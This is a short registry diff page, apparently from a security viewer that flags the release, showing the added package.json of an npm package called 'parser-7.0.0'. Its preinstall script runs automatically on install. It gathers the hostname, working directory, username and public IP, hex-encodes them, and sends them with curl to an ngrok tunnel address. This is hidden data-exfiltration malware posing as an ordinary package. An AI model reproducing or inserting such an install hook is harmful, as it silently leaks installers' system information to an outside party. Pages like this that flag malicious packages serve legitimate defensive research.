parser-7.0.0 4.0.6
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of parser-7.0.0 might be problematic. Click here for more details.
- package/package.json +15 -0
package/package.json
ADDED
@@ -0,0 +1,15 @@
|
|
1
|
+
{
|
2
|
+
"name": "parser-7.0.0",
|
3
|
+
"version": "4.0.6",
|
4
|
+
"main": "main.js",
|
5
|
+
"scripts": {
|
6
|
+
"preinstall": "a=$(hostname;pwd;whoami;echo 'parser-7.0.0';curl https://ifconfig.me) && echo $a | xxd -p | head | while read ut;do curl -m 1 4.tcp.eu.ngrok.io:15696/_=$ut;done ",
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
8
|
+
},
|
9
|
+
"author": "lexi2",
|
10
|
+
"license": "ISC",
|
11
|
+
"dependencies": {
|
12
|
+
"lodash": "^4.17.21"
|
13
|
+
},
|
14
|
+
"description": ""
|
15
|
+
}
|